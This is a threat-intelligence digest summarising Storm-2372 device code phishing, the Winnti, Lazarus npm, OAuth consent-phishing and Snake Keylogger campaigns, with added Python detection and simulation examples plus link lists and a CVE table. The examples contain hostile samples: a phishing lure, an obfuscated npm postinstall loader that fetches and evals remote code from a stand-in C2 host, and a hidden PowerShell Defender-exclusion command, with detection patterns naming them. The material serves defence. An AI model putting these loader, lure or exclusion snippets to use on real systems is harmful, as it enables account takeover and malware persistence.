Russian threat actors use device code phishing to gain access to Microsoft accounts
Microsoft researchers observed an ongoing campaign, attributed to the suspected Russian threat actor Storm-2372, that has targeted governments, non-governmental organisations, and various industries since at least August 2024. The campaign uses so-called ‘device code phishing’: the attacker starts a legitimate OAuth device code sign-in for a productivity app and tricks the victim into completing it, so that the resulting access and refresh tokens are issued to the attacker rather than to a device the victim controls. The attackers first approach potential victims over third-party messaging services such as WhatsApp, Signal, and Microsoft Teams while posing as a prominent individual, then send invitations to online events or meetings via phishing emails that ask the user to complete a device code authentication request. Completing the request gives the attacker access to the victim’s account and enables Graph API data collection such as email harvesting.
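The mechanics above are easier to see in code. The following Python is an added illustration, not Microsoft's code and not anything recovered from the Storm-2372 campaign: it models the OAuth 2.0 device authorization grant (RFC 8628) with an in-process authorization server, an attacker-controlled client and a victim, and shows why the tokens land with whoever started the flow. The endpoint URL, client name, scopes and code format are all made up; `allow_device_flow` stands in for a tenant policy (such as a Conditional Access rule) that refuses the grant.

```python
"""Device code phishing, modelled on the OAuth 2.0 device authorization grant
(RFC 8628). Added illustration: the authorization server, the attacker's
client and the victim are in-process stubs, and the endpoint, client and
scope names are constructed for this example."""
import secrets
import time
from dataclasses import dataclass
from typing import Optional


@dataclass
class DeviceAuth:
    device_code: str          # secret; known only to the client that started the flow
    user_code: str            # short code the human types on the verification page
    client_id: str
    scope: str
    expires_at: float
    approved_by: Optional[str] = None


class AuthServer:
    """Minimal authorization server. allow_device_flow stands in for a tenant
    policy (e.g. a Conditional Access rule) that blocks the grant outright."""

    def __init__(self, allow_device_flow: bool = True):
        self.allow_device_flow = allow_device_flow
        self.pending: dict = {}       # device_code -> DeviceAuth
        self.by_user_code: dict = {}  # user_code -> DeviceAuth

    def device_authorization(self, client_id: str, scope: str, lifetime: int = 900):
        """Device authorization endpoint: hands both codes to whoever calls it."""
        if not self.allow_device_flow:
            raise PermissionError("device code grant disabled by policy")
        auth = DeviceAuth(device_code=secrets.token_urlsafe(32),
                          user_code=f"{secrets.randbelow(10**9):09d}",  # constructed format
                          client_id=client_id, scope=scope,
                          expires_at=time.time() + lifetime)
        self.pending[auth.device_code] = auth
        self.by_user_code[auth.user_code] = auth
        return {"device_code": auth.device_code, "user_code": auth.user_code,
                "verification_uri": "https://login.example/devicelogin",
                "expires_in": lifetime, "interval": 5}

    def user_enters_code(self, user: str, user_code: str) -> bool:
        """Verification page: the victim signs in (genuinely, on the real site)
        and types the code. The server cannot tell that the matching
        device_code is held by someone else."""
        auth = self.by_user_code.get(user_code)
        if auth is None or time.time() > auth.expires_at:
            return False
        auth.approved_by = user
        return True

    def token(self, client_id: str, device_code: str) -> dict:
        """Token endpoint, grant_type=urn:ietf:params:oauth:grant-type:device_code."""
        auth = self.pending.get(device_code)
        if auth is None or auth.client_id != client_id:
            return {"error": "invalid_grant"}
        if time.time() > auth.expires_at:
            return {"error": "expired_token"}
        if auth.approved_by is None:
            return {"error": "authorization_pending"}
        del self.pending[device_code]
        return {"token_type": "Bearer", "scope": auth.scope,
                "access_token": f"at:{auth.approved_by}:{secrets.token_hex(8)}",
                "refresh_token": f"rt:{secrets.token_hex(8)}"}


def run_phish(server: AuthServer, victim: str, client_id: str = "attacker-client"):
    """Attacker starts the flow, puts only the user_code in a lure, and polls
    the token endpoint until the victim has completed sign-in."""
    try:
        codes = server.device_authorization(client_id, "Mail.Read offline_access")
    except PermissionError:
        return None                                  # policy stopped the flow
    lure = (f"Your meeting invitation is ready: open {codes['verification_uri']} "
            f"and enter code {codes['user_code']}")
    first_poll = server.token(client_id, codes["device_code"])   # not yet approved
    server.user_enters_code(victim, codes["user_code"])          # victim follows the lure
    tokens = server.token(client_id, codes["device_code"])       # issued to the attacker
    return {"lure": lure, "first_poll": first_poll, "tokens": tokens}


if __name__ == "__main__":
    result = run_phish(AuthServer(), "victim@example.org")
    print(result["first_poll"], result["tokens"]["access_token"], sep="\n")
    print(run_phish(AuthServer(allow_device_flow=False), "victim@example.org"))
```

Nothing in the exchange is forged: the victim authenticates on the genuine verification page, which is why password hygiene and phishing-resistant MFA do not stop it. The two controls the simulation exposes are refusing the grant type for users who have no business using it (the `allow_device_flow` branch) and treating device-code sign-ins from unfamiliar locations as a review trigger.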
Winnti APT targets Japanese organisations with updated version of Winnti malware
In March 2024, LAC Watch researchers observed a campaign, attributed to the Winnti advanced persistent threat (APT) actor, that targeted Japanese organisations in the manufacturing, materials, and energy sectors. The campaign, dubbed RevivalStone, employed a novel version of the Winnti malware that has enhanced capabilities and leverages sophisticated evasion techniques. The campaign typically began with the exploitation of SQL injection vulnerabilities in web-facing enterprise resource planning software. The threat actor also deployed webshells such as China Chopper, Behinder, and ‘sqlmap file uploader’ to gain initial access, perform reconnaissance, harvest credentials, and move laterally.
Lazarus Group uses malicious npm packages to target developers as part of supply chain attack
SecurityScorecard researchers identified a new campaign, dubbed Operation Marstech Mayhem, by the North Korean threat actor Lazarus Group. The campaign targets developers with malicious npm packages that contain a new advanced implant, dubbed Marstech1, aimed at developers’ machines and the cryptocurrency wallets on them. Lazarus Group uses fake GitHub repositories, advertised via LinkedIn and Discord, to host legitimate-looking projects that contain obfuscated JavaScript payloads serving as a loader. The loader fetches additional payloads based on the victim’s system configuration, with the final payload used to exfiltrate cryptocurrency wallet data and authentication credentials.
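A practitioner reading this wants a way to triage a dependency for the two traits described: code that runs at install time, and an obfuscated loader that fingerprints the host and fetches a second stage. The Python below is an added example, not SecurityScorecard's tooling and not Marstech1 indicators; its patterns are generic heuristics, and the two packages it audits are constructed in memory (path to file contents) so it runs offline. Package names, strings and the hex-escaped literal are invented.

```python
"""Heuristic audit of an npm package for install-time execution and obfuscated
loader code. Added example: generic patterns, not indicators from any real
campaign. Both sample packages are constructed (path -> file contents)."""
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Generic markers of a staged loader; none is proof on its own.
PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "function_constructor": re.compile(r"\bnew\s+Function\s*\("),
    "child_process": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "hex_escape_run": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
    "long_opaque_literal": re.compile(r"['\"][A-Za-z0-9+/=]{120,}['\"]"),
    "remote_fetch": re.compile(r"\b(?:fetch|https?\.get|axios\.get)\s*\("),
    "host_fingerprint": re.compile(r"\bos\.(?:platform|hostname|userInfo|arch)\s*\("),
}


def audit_package(files: dict) -> list:
    """Return human-readable findings for one package (empty list = nothing flagged)."""
    findings = []
    manifest = json.loads(files.get("package.json", "{}"))
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        if hook in scripts:
            findings.append(f"package.json: '{hook}' runs automatically on npm install: {scripts[hook]}")
    for path, source in files.items():
        if not path.endswith((".js", ".cjs", ".mjs")):
            continue
        hits = [name for name, rx in PATTERNS.items() if rx.search(source)]
        if hits:
            findings.append(f"{path}: {', '.join(hits)}")
    return findings


def summarize(files: dict) -> str:
    findings = audit_package(files)
    return "clean" if not findings else f"{len(findings)} finding(s)"


# Constructed samples. The suspicious one mimics a loader that fingerprints the
# host and fetches a second stage; the package names and strings are invented.
BENIGN_PACKAGE = {
    "package.json": json.dumps({"name": "left-pad-ish", "version": "1.0.0", "main": "index.js",
                                "scripts": {"test": "node test.js"}}),
    "index.js": "module.exports = (s, n) => String(s).padStart(n, ' ');\n",
}

SUSPICIOUS_PACKAGE = {
    "package.json": json.dumps({"name": "react-dom-utilz", "version": "0.0.3", "main": "index.js",
                                "scripts": {"postinstall": "node lib/setup.js"}}),
    "index.js": "module.exports = require('./lib/setup.js');\n",
    "lib/setup.js": (
        "const os = require('os');\n"
        "const _k = '\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x63\\x32';\n"
        "const profile = [os.platform(), os.arch(), os.hostname()].join('|');\n"
        "fetch(_k + '/stage2?p=' + profile).then(r => r.text()).then(c => eval(c));\n"
    ),
}


if __name__ == "__main__":
    for name, pkg in (("benign", BENIGN_PACKAGE), ("suspicious", SUSPICIOUS_PACKAGE)):
        print(name, summarize(pkg))
        for line in audit_package(pkg):
            print("  ", line)
```

Two caveats. Legitimate packages also use lifecycle scripts, so the install hook finding is a prompt to read the script, not a verdict; and the detection is deliberately shallow, because a loader that decodes itself at runtime will only show its real behaviour under dynamic analysis. Running installs with `npm install --ignore-scripts` in CI removes the install-time execution path regardless of what a scanner catches.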
Phishing campaign uses fake Microsoft login page to install fake Adobe Drive X app
Cofense researchers discovered a phishing campaign that abuses the legitimate Microsoft 365 login page to trick users into granting consent to a malicious OAuth application named ‘Adobe Drive X’. The attack begins with a phishing email disguised as an Office 365 password reset request, containing a link that redirects users to the legitimate Microsoft authentication page. There, users are asked to enter their credentials and grant the requested permissions to the Adobe Drive X app. If the user clicks ‘Accept’ on the consent prompt, the application is authorised against their account and they are then redirected to a credential phishing page disguised as a Microsoft login page.
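Because the consent is given on Microsoft's own page, the artefact to hunt for is the permission grant itself rather than a malicious URL. The Python below is an added example, not Cofense's analysis or the campaign's actual permission set: it reviews delegated grants for the pattern described (a single user, not an admin, consenting to an unverified app that asks for mailbox or file scopes plus `offline_access`). The record fields follow Microsoft Graph's `oauth2PermissionGrant` resource (`clientId`, `consentType`, `principalId`, `scope`), but every value, identifier and the scope list are constructed; ‘Adobe Drive X’ appears only as the display name the page reports.

```python
"""Review of delegated OAuth permission grants for the consent-phishing pattern:
a user (not an admin) consents to an unverified application requesting mailbox
or file scopes plus offline_access. Added example; field names follow Graph's
oauth2PermissionGrant resource, all values are constructed."""

# Delegated scopes whose grant to an unknown app warrants review (illustrative set).
RISKY_SCOPES = {"Mail.Read", "Mail.ReadWrite", "Mail.Send", "MailboxSettings.ReadWrite",
                "Files.Read.All", "Files.ReadWrite.All", "Contacts.Read", "Notes.Read.All"}

# Service principals keyed by the clientId used in grants (constructed).
APPS = {
    "sp-1111": {"displayName": "Adobe Drive X", "verifiedPublisher": None},
    "sp-2222": {"displayName": "Microsoft Teams", "verifiedPublisher": "Microsoft Corporation"},
    "sp-3333": {"displayName": "Contoso Expense Sync", "verifiedPublisher": "Contoso Ltd"},
}

# consentType "Principal" = one user consented for themselves; "AllPrincipals" = admin consent.
GRANTS = [
    {"id": "g1", "clientId": "sp-1111", "consentType": "Principal", "principalId": "user-0042",
     "scope": "openid profile offline_access Mail.Read Files.ReadWrite.All"},
    {"id": "g2", "clientId": "sp-2222", "consentType": "AllPrincipals", "principalId": None,
     "scope": "User.Read"},
    {"id": "g3", "clientId": "sp-3333", "consentType": "AllPrincipals", "principalId": None,
     "scope": "Files.Read.All offline_access"},
]


def review_grants(grants, apps):
    """Return flagged grants, highest score first; score = number of reasons."""
    findings = []
    for g in grants:
        app = apps.get(g["clientId"], {})
        scopes = set(g["scope"].split())
        risky = sorted(scopes & RISKY_SCOPES)
        if not risky:
            continue
        reasons = [f"risky delegated scopes: {', '.join(risky)}"]
        if g["consentType"] == "Principal":
            reasons.append(f"consented by a single user ({g['principalId']}) rather than an admin")
        if "offline_access" in scopes:
            reasons.append("offline_access: a refresh token keeps working after the user signs out")
        if not app.get("verifiedPublisher"):
            reasons.append("publisher is not verified")
        findings.append({"grant": g["id"], "app": app.get("displayName", g["clientId"]),
                         "score": len(reasons), "reasons": reasons})
    return sorted(findings, key=lambda f: -f["score"])


if __name__ == "__main__":
    for f in review_grants(GRANTS, APPS):
        print(f"[{f['score']}] {f['app']} ({f['grant']})")
        for r in f["reasons"]:
            print("   -", r)
```

A grant that scores on all four reasons is the consent-phishing shape exactly; the admin-consented, verified-publisher grant with one risky scope is the kind of thing that should already be on an approved-apps list. Remediation is to delete the grant (Graph exposes this as `DELETE /oauth2PermissionGrants/{id}`) and, preventively, to restrict user consent to verified publishers and low-risk permissions so that a lure like this one ends in an admin approval request instead of a live token.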
Phishing campaign targets Turkish aerospace and defence sectors with Snake Keylogger
Malwation researchers identified a phishing campaign targeting Turkish enterprises in the defence and aerospace sectors with a variant of the Snake Keylogger infostealer. The attackers impersonate Turkish Aerospace Industries to deliver the phishing emails under the guise of contractual agreements. Snake Keylogger uses PowerShell to add itself to the Windows Defender exclusion list and performs anti-virtual-machine and other anti-analysis checks. The malware also uses scheduled tasks for persistence, then harvests sensitive data such as credentials, cookies, and financial information from a wide range of browsers and email clients. Stolen data is sent through communication channels specified by the threat actor, such as Telegram, Discord, FTP, or SMTP.
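The two host-side behaviours in that summary, a Defender exclusion added via PowerShell and a scheduled task for persistence, both leave Windows event records. The Python below is an added example, not Malwation's detection content: it runs three heuristics over constructed event records (a process-creation command line containing `Add-MpPreference -Exclusion…`, a Defender Operational 5007 configuration-change record whose new value is under `Exclusions\`, and a Security 4698 task-creation record whose action lives in a user-writable directory) and then correlates per host. Channel names and event IDs follow the usual Windows conventions; the hostnames, paths and message text are invented.

```python
"""Detection pass over Windows event records for two behaviours: Defender
exclusions added (directly, or via PowerShell Add-MpPreference) and a
scheduled task whose action is in a user-writable directory. Added example;
event shapes follow Security 4688/4698, Sysmon 1 and Defender Operational
5007 conventions, but every record below is constructed."""
import re
from collections import defaultdict

ADD_EXCLUSION_CMD = re.compile(r"Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension)", re.I | re.S)
EXCLUSION_KEY = re.compile(r"Windows Defender\\Exclusions\\(Paths|Processes|Extensions)\\(.+?)\s*=", re.I)
TASK_COMMAND = re.compile(r"<Command>(.*?)</Command>", re.I | re.S)
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|Public|ProgramData|Downloads)\\", re.I)

DEFENDER_OP = "Microsoft-Windows-Windows Defender/Operational"
SYSMON_OP = "Microsoft-Windows-Sysmon/Operational"


def detect(events):
    """Return (host, rule, detail) tuples for records matching the heuristics."""
    alerts = []
    for ev in events:
        host, ch, eid, msg = ev["host"], ev["channel"], ev["event_id"], ev["message"]
        if (ch == "Security" and eid == 4688) or (ch == SYSMON_OP and eid == 1):
            if ADD_EXCLUSION_CMD.search(msg):
                alerts.append((host, "defender_exclusion_cmdline", msg.strip()))
        elif ch == DEFENDER_OP and eid == 5007:
            m = EXCLUSION_KEY.search(msg)
            if m:
                alerts.append((host, "defender_exclusion_added", f"{m.group(1)}: {m.group(2)}"))
        elif ch == "Security" and eid == 4698:
            m = TASK_COMMAND.search(msg)
            if m and USER_WRITABLE.search(m.group(1)):
                alerts.append((host, "scheduled_task_user_writable", m.group(1).strip()))
    return alerts


def correlate(alerts):
    """Hosts showing both an exclusion change and a user-writable task action."""
    by_host = defaultdict(set)
    for host, rule, _ in alerts:
        by_host[host].add(rule)
    exclusion_rules = {"defender_exclusion_added", "defender_exclusion_cmdline"}
    return sorted(h for h, rules in by_host.items()
                  if "scheduled_task_user_writable" in rules and rules & exclusion_rules)


# Constructed records. WS01 shows the full chain; WS02 only a vendor updater task.
EVENTS = [
    {"host": "WS01", "channel": SYSMON_OP, "event_id": 1,
     "message": r"CommandLine: powershell.exe -NoP -W Hidden -Command Add-MpPreference -ExclusionPath 'C:\Users\ayse\AppData\Roaming\winsvc'"},
    {"host": "WS01", "channel": DEFENDER_OP, "event_id": 5007,
     "message": r"Microsoft Defender Antivirus Configuration has changed. Old value:  New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\ayse\AppData\Roaming\winsvc = 0x0"},
    {"host": "WS01", "channel": "Security", "event_id": 4698,
     "message": r'A scheduled task was created. Task Name: \Updates\WinSvc Task Content: <Actions Context="Author"><Exec><Command>C:\Users\ayse\AppData\Roaming\winsvc\winsvc.exe</Command></Exec></Actions>'},
    {"host": "WS02", "channel": "Security", "event_id": 4698,
     "message": r'A scheduled task was created. Task Name: \Vendor\Updater Task Content: <Actions Context="Author"><Exec><Command>C:\Program Files\Vendor\updater.exe</Command></Exec></Actions>'},
]


if __name__ == "__main__":
    found = detect(EVENTS)
    for host, rule, detail in found:
        print(f"{host}: {rule}: {detail}")
    print("high confidence:", correlate(found))
```

The 5007 record is the one worth keying on: it fires whether the exclusion was added by PowerShell, by `MpCmdRun`, or by direct registry write, so it survives an attacker swapping the tool. The command-line rule needs Security 4688 with command-line auditing enabled or Sysmon; without either, the first heuristic never fires and the correlation still works off the other two.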
Ransomware
#StopRansomware: Ghost (Cring) Ransomware – CISA Cybersecurity Advisories – Feb 19 2025
Russian CryptoBytes Hackers Target Windows Machines with UxCryptor Ransomware – GBHackers On Security – Feb 19 2025
Threat Spotlight: Inside the World’s Fastest Rising Ransomware Operator: BlackLock – ReliaQuest – Feb 18 2025
Beware! Fake Outlook Support Calls Leading to Ransomware Attacks – GBHackers On Security – Feb 17 2025
Investigating Anonymous VPS services used by Ransomware Gangs – BushidoToken Blog – Feb 14 2025
Ransomware Roundup – Lynx – Fortinet – Feb 14 2025
RansomHub Becomes 2024’s Top Ransomware Group, Hitting 600+ Organizations Globally – The Hacker News – Feb 14 2025
Financial Services
Multi-Layered Cryptocurrency Fraud: How CryptoGrab Drains Millions Through Scam Websites and Phishing – Abnormal Security – Feb 19 2025
Zhong Stealer Analysis: New Malware Targeting Fintech and Cryptocurrency – Siembiot – Feb 19 2025
NPM package targeting crypto wallets uses new language to evade detection – SourceCodeRED – Feb 16 2025
Hacker leaks account data of 12 million Zacks Investment users – Bleeping Computer – Feb 13 2025
Magento Credit Card Stealer Disguised in an <img> Tag – Sucuri Blog – Feb 12 2025
Geopolitics
Kimsuky Impersonates the Embassy of Japan in the United States – Scarlet Shark Blog – Feb 19 2025
Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively Targeting Signal Messenger – Mandiant.com – Feb 19 2025
Philippines reports foreign cyber intrusions targeting intelligence data, but no breaches – Reuters – Feb 18 2025
Pro-Russia collective NoName057(16) launched a new wave of DDoS attacks on Italian sites – Security Affairs – Feb 17 2025
Ukrainian Intelligence Agency Hacks Russian Oil and Gas Contractor Systems – Defense Post – Feb 13 2025
High Priority Vulnerabilities
| CVE | Software | Base Score | Temporal Score | Related coverage |
|---|---|---|---|---|
| CVE-2025-0108 | Prisma Access | 9.1 | 7.3 | Recently patched PAN-OS authentication bypass flaw actively exploited |
| CVE-2025-1094 | PostgreSQL | 8.1 | 7.7 | CVE-2025-1094: PostgreSQL psql SQL injection (FIXED) |
| CVE-2024-53704 | SonicOS | 8.2 | 7.0 | Active exploitation attempts of recently patched SonicOS flaw observed |
| CVE-2025-24989 | Power Pages | 8.2 | 7.0 | Microsoft Patches Actively Exploited Power Pages Privilege Escalation Vulnerability |
| CVE-2025-22960 | Maxiva VAXT | 7.3 | 7.1 | Multiple zero-day flaws discovered in GatesAir Maxiva UAXT and VAXT transmitters |